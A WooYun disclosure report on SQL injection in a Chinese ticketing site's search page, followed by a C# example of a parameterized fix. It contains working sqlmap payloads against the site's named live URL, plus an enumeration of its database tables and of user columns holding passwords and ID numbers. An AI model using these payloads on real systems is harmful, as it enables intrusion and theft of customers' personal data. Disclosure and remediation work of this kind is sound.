Vulnerability Summary

Defect ID: wooyun-2015-0151936

Title: 中国票务中心 (China Ticket Center, 51piao.com): multiple parameters vulnerable to SQL injection (200,000 user records plus large volumes of log and order data exposed)

Affected vendor: 中国票务中心

Author: 路人甲

Submitted: 2015-11-05 09:46

Fix time: 2015-12-20 09:48

Published: 2015-12-20 09:48

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:


Vulnerability Details

Disclosure status:

2015-11-05: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed
2015-12-20: The vendor has chosen to ignore the vulnerability; details disclosed to the public

Brief description:

I searched and did not find a duplicate submission!~~~

Detailed description:

First, the URL is

http://www.51piao.com/Ticket/TicketList.aspx?cityid=157&ticketaddrid=&tickettypeid=2&ticketdays=&ticketprice=&name=&style=&sort=3&price1=&price2=&day1=&day2=


Multiple parameters are injectable: cityid, ticketaddrid and name. Appending a single quote to cityid:

http://www.51piao.com/Ticket/TicketList.aspx?cityid=157'&ticketaddrid=&tickettypeid=2&ticketdays=&ticketprice=&name=&style=&sort=3&price1=&price2=&day1=&day2=


The test returns the following result (the raw ASP.NET error page, showing that the quote reaches SQL Server unescaped):


“/”应用程序中的服务器错误。
第 1 行: ') And (TicketTypeId=' 附近有语法错误。 字符串 ') And TicketTypeId<>31 order by [BeginDate] asc' 之前有未闭合的引号。
说明: 执行当前 Web 请求期间,出现未处理的异常。请检查堆栈跟踪信息,以了解有关该错误以及代码中导致错误的出处的详细信息。
异常详细信息: System.Exception: 第 1 行: ') And (TicketTypeId=' 附近有语法错误。 字符串 ') And TicketTypeId<>31 order by [BeginDate] asc' 之前有未闭合的引号。


So that should be an injection!~~~ Confirming with sqlmap:


sqlmap identified the following injection points with a total of 509 HTTP(s) requests:
---
Place: GET
Parameter: cityid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cityid=157) AND 6477=6477 AND (9107=9107&ticketaddrid=&tickettypeid=2&ticketdays=&ticketprice=&name=&style=&sort=3&price1=&price2=&day1=&day2=
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: cityid=157) AND 6063=CONVERT(INT,(SELECT CHAR(113)+CHAR(110)+CHAR(119)+CHAR(109)+CHAR(113)+(SELECT (CASE WHEN (6063=6063) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(115)+CHAR(102)+CHAR(113))) AND (1862=1862&ticketaddrid=&tickettypeid=2&ticketdays=&ticketprice=&name=&style=&sort=3&price1=&price2=&day1=&day2=
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: cityid=-1157) UNION ALL SELECT CHAR(113)+CHAR(110)+CHAR(119)+CHAR(109)+CHAR(113)+CHAR(87)+CHAR(70)+CHAR(74)+CHAR(121)+CHAR(88)+CHAR(106)+CHAR(79)+CHAR(119)+CHAR(78)+CHAR(97)+CHAR(113)+CHAR(107)+CHAR(115)+CHAR(102)+CHAR(113)-- &ticketaddrid=&tickettypeid=2&ticketdays=&ticketprice=&name=&style=&sort=3&price1=&price2=&day1=&day2=
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: cityid=157); WAITFOR DELAY '0:0:5'--&ticketaddrid=&tickettypeid=2&ticketdays=&ticketprice=&name=&style=&sort=3&price1=&price2=&day1=&day2=
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: cityid=157) WAITFOR DELAY '0:0:5'--&ticketaddrid=&tickettypeid=2&ticketdays=&ticketprice=&name=&style=&sort=3&price1=&price2=&day1=&day2=
Place: GET
Parameter: name
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cityid=157&ticketaddrid=&tickettypeid=2&ticketdays=&ticketprice=&name=%' AND 4525=4525 AND '%'='&style=&sort=3&price1=&price2=&day1=&day2=
Place: GET
Parameter: ticketaddrid
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: cityid=157&ticketaddrid=(SELECT CHAR(113)+CHAR(110)+CHAR(119)+CHAR(109)+CHAR(113)+(SELECT (CASE WHEN (7962=7962) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(115)+CHAR(102)+CHAR(113))&tickettypeid=2&ticketdays=&ticketprice=&name=&style=&sort=3&price1=&price2=&day1=&day2=
---
there were multiple injection points, please select the one to use for following injections:
[0] place: GET, parameter: cityid, type: Unescaped numeric (default)
[1] place: GET, parameter: ticketaddrid, type: Unescaped numeric
[2] place: GET, parameter: name, type: Single quoted string
[q] Quit
> 0
[23:39:41] [INFO] testing Microsoft SQL Server
[23:39:41] [INFO] confirming Microsoft SQL Server
[23:39:42] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2000
Database: www_51piao_com
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| dbo.OrderLog | 960530 |
| dbo.TicketPrice | 370802 |
| dbo.vMemberAll | 341320 |
| dbo.vTicketPrice | 248386 |
| dbo.MemberAddrBook | 205920 |
| dbo.Member | 198769 |
| dbo.vMember | 198769 |
| dbo.OrderMain | 179354 |
| dbo.OprLog | 178047 |
| dbo.vEmailAll | 130008 |
| dbo.MemberPointLog | 126478 |
| dbo.TicketOrderDetail | 124531 |
| dbo.vTicketOrderStat | 124531 |
| dbo.vFlightTicketOrder | 121509 |
| dbo.SmsLog | 110875 |
| dbo.TicketOrder | 105987 |
| dbo.vTicketOrder | 105987 |
| dbo.vMobileTemp | 98091 |
| dbo.vMoibleAll | 98091 |
| dbo.vMobileAllOrder | 98081 |
| dbo.vMemberTemp | 93102 |
| dbo.MemberMoneyLog | 81837 |
| dbo.TicketPlay | 81605 |
| dbo.VTicketPlayMag | 81559 |
| dbo.FlightLog | 72994 |
| dbo.TrainNew | 70195 |
| dbo.vLoginLog | 58650 |
| dbo.ImagesTicket | 37724 |
| dbo.monitor | 36593 |
| dbo.FlightOrderDetail | 31300 |
| dbo.vFlightOrderDetail | 21042 |
| dbo.FlightOrder | 15522 |
| dbo.vFlightOrder | 15522 |
| dbo.Ticket | 14240 |
| dbo.vTicket | 14124 |
| dbo.vTicketDetail | 14124 |
| dbo.vTicketMag | 14124 |
| dbo.OrderPayCard | 13596 |
| dbo.vOrderPayCard | 13596 |
| dbo.MemberLog | 11971 |
| dbo.vFlightTicketSend | 10293 |
| dbo.AccountAll | 8329 |
| dbo.TicketPreOrder | 6289 |
| dbo.vTicketAddrUse | 5215 |
| dbo.FlightLogStat | 2756 |
| dbo.TicketReview | 2220 |
| dbo.vTicketReviewList | 1808 |
| dbo.FlightKM | 1398 |
| dbo.o_kehu | 1317 |
| dbo.ImagesCommon | 860 |
| dbo.WebTop | 858 |
| dbo.JOYCOMPANY | 786 |
| dbo.vJoyCompany | 786 |
| dbo.VJoyCompanyMag | 786 |
| dbo.LinkInfo | 780 |
| dbo.CITY | 647 |
| dbo.AgentInfo | 526 |
| dbo.VChinaCity | 455 |
| dbo.NewsHelp | 431 |
| dbo.vNewsHelp | 416 |
| dbo.VNewsHelp1 | 416 |
| dbo.PointProductOrder | 293 |
| dbo.vTicketBig | 280 |
| dbo.vTicketHomeTop | 279 |
| dbo.MemberWebUnion | 210 |
| dbo.vTicketLeft | 176 |
| dbo.vTicketSmall | 155 |
| dbo.FlightCityCode | 152 |
| dbo.FlightSale | 144 |
| dbo.VFlightSale | 141 |
| dbo.Area | 131 |
| dbo.Users | 116 |
| dbo.vUserMag | 116 |
| dbo.BlackIp | 103 |
| dbo.REGION | 96 |
| dbo.PointProduct | 84 |
| dbo.TrainTrade | 65 |
| dbo.vTrainTrade | 65 |
| dbo.TrainTradeBak | 60 |
| dbo.NewsHelpModule | 57 |
| dbo.sysconstraints | 54 |
| dbo.vPointProduct | 44 |
| dbo.vPointProduct1 | 44 |
| dbo.TravelLine | 35 |
| dbo.vTravelLine | 35 |
| dbo.VTravelLine1 | 35 |
| dbo.vTravelLineDetail | 35 |
| dbo.Province | 34 |
| dbo.vMobileAllTrain | 26 |
| dbo.vTicketTypeCount | 22 |
| dbo.TempSql | 17 |
| dbo.vJoyCompanyTop | 17 |
| dbo.TicketType | 14 |
| dbo.vTicketType | 14 |
| dbo.OrderPayMethod | 12 |
| dbo.FlightSpec | 11 |
| dbo.vFlightSpec | 11 |
| dbo.MemberGroup | 10 |
| dbo.SmsTemplate | 10 |
| dbo.vSmsTemplate | 10 |
| dbo.vTemp | 10 |
| dbo.BaseCreditCard | 9 |
| dbo.WebModule | 9 |
| dbo.vWebCity | 8 |
| dbo.WebCity | 8 |
| dbo.BlackList | 7 |
| dbo.SmsEvent | 7 |
| dbo.BbsBanner | 6 |
| dbo.Groups | 6 |
| dbo.OrderFlightTakeAddr | 6 |
| dbo.PointProductType | 5 |
| dbo.vHomeTicket | 5 |
| dbo.vSmsModule | 5 |
| dbo.HotelOrder | 4 |
| dbo.vHotelOrder | 4 |
| dbo.syssegments | 3 |
| dbo.BaseYesNo | 2 |
| dbo.FlightTicketAddr | 2 |
| dbo.PriceType | 2 |
| dbo.CompanySeq | 1 |
| dbo.FlightSaleTop | 1 |
| dbo.OrderSeq | 1 |
| dbo.TravelCompany | 1 |
+-------------------------+---------+
| dbo.Member | 198769 |
| dbo.vMember | 198769 |
| dbo.Users | 116 |
| dbo.vUserMag | 116 |
Database: www_51piao_com
Table: Users
[9 columns]
+---------------+
| Column |
+---------------+
| Account |
| ID |
| IsDisabled |
| LastLoginTime |
| LEVELID |
| LoginCount |
| Password |
| PurView |
| UserName |
+---------------+
Database: www_51piao_com
Table: vUserMag
[10 columns]
+---------------+
| Column |
+---------------+
| Account |
| DepartName |
| ID |
| IsDisabled |
| LastLoginTime |
| LEVELID |
| LoginCount |
| Password |
| PurView |
| UserName |
+---------------+
Database: www_51piao_com
Table: Member
[43 columns]
+---------------+
| Column |
+---------------+
| Account |
| Address |
| Balance |
| BirthDay |
| CardNo |
| CardType |
| CityId |
| COMPANYADDR |
| CompanyId |
| CompanyName |
| COMPANYTEL |
| CompanyType |
| Degree |
| Email |
| FAX |
| GroupId |
| ID |
| ISAuditing |
| IsBindMobile |
| IsChinese |
| IsDesignWeb |
| IsDisabled |
| IsMailList |
| IsWeb |
| LastLoginTime |
| LoginCount |
| MemberType |
| MEMO |
| MOBILE |
| Name |
| NickName |
| openid |
| POINT |
| ProvinceId |
| Pwd |
| RegDate |
| SEX |
| STAFFID |
| STAFFNAME |
| TEL |
| VipMoney |
| VipNo |
| ZIPCODE |
+---------------+
Database: www_51piao_com
Table: vMember
[45 columns]
+---------------+
| Column |
+---------------+
| Account |
| Address |
| Balance |
| BirthDay |
| CardNo |
| CardType |
| City |
| CityId |
| COMPANYADDR |
| CompanyId |
| CompanyName |
| COMPANYTEL |
| CompanyType |
| Degree |
| Email |
| FAX |
| GroupId |
| GroupName |
| ID |
| ISAuditing |
| IsBindMobile |
| IsChinese |
| IsDesignWeb |
| IsDisabled |
| IsMailList |
| IsWeb |
| LastLoginTime |
| LoginCount |
| MemberType |
| MEMO |
| MOBILE |
| Name |
| NickName |
| openid |
| POINT |
| ProvinceId |
| Pwd |
| RegDate |
| SEX |
| STAFFID |
| STAFFNAME |
| TEL |
| VipMoney |
| VipNo |
| ZIPCODE |
+---------------+


The data set is quite large, so I did not go any further!~~~~

Proof of vulnerability:

As above

Fix recommendation:

Filter the input and fix it!~~~

Copyright notice: when reposting, please credit 路人甲@乌云 (WooYun)
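Filtering alone is a weak fix for this class of bug; the durable fix is to stop concatenating request values into T-SQL. The following is an added example, not the site's code: the concatenation pattern the error message implies, beside a parameterized replacement for the same TicketList filter. CityId, TicketTypeId and [BeginDate] come from the error text; the table name Ticket, the columns TicketAddrId and Name, and the LIKE '%...%' match on name are assumptions, and the code is written for current .NET rather than the ASP.NET 1.1 runtime sqlmap reports.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;
using System.Text;

public static class TicketListQuery
{
    // Pattern implied by the error page: request values spliced straight into T-SQL,
    // so a single quote in cityid or name rewrites the statement. Kept only for contrast.
    public static string BuildUnsafeSql(string cityId, string ticketTypeId, string name)
    {
        return "SELECT * FROM Ticket WHERE (CityId=" + cityId + ") And (TicketTypeId=" + ticketTypeId + ")"
             + " And Name LIKE '%" + name + "%' And TicketTypeId<>31 order by [BeginDate] asc";
    }

    // Hardened form: every request value travels as a typed SqlParameter, optional filters
    // are appended only when present, and the LIKE pattern is assembled in code, not in SQL.
    public static SqlCommand BuildSafeCommand(SqlConnection conn, string cityId,
                                              string ticketAddrId, int ticketTypeId, string name)
    {
        StringBuilder sql = new StringBuilder(
            "SELECT * FROM Ticket WHERE TicketTypeId=@ticketTypeId AND TicketTypeId<>31");
        SqlCommand cmd = new SqlCommand();
        cmd.Connection = conn;
        cmd.Parameters.Add("@ticketTypeId", SqlDbType.Int).Value = ticketTypeId;
        int id;
        if (int.TryParse(cityId, out id))            // non-numeric input is simply not a filter
        {
            sql.Append(" AND CityId=@cityId");
            cmd.Parameters.Add("@cityId", SqlDbType.Int).Value = id;
        }
        if (int.TryParse(ticketAddrId, out id))      // assumed column name TicketAddrId
        {
            sql.Append(" AND TicketAddrId=@ticketAddrId");
            cmd.Parameters.Add("@ticketAddrId", SqlDbType.Int).Value = id;
        }
        if (!string.IsNullOrEmpty(name))
        {
            sql.Append(" AND Name LIKE @name");
            cmd.Parameters.Add("@name", SqlDbType.NVarChar).Value = "%" + EscapeLike(name) + "%";
        }
        sql.Append(" ORDER BY [BeginDate] ASC");
        cmd.CommandText = sql.ToString();
        return cmd;
    }

    // Wildcards typed by the user must match literally, so escape them for T-SQL LIKE ('[' first).
    private static string EscapeLike(string s) =>
        s.Replace("[", "[[]").Replace("%", "[%]").Replace("_", "[_]");
}
```

The parameterized command also removes the error-based channel: a quote in cityid no longer produces a T-SQL syntax error, and the page should in any case return a generic error rather than the raw exception text.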


Vendor Response

Vendor response:

Vendor could not be contacted, or vendor actively declined

Vulnerability Rank: 15 (WooYun rating)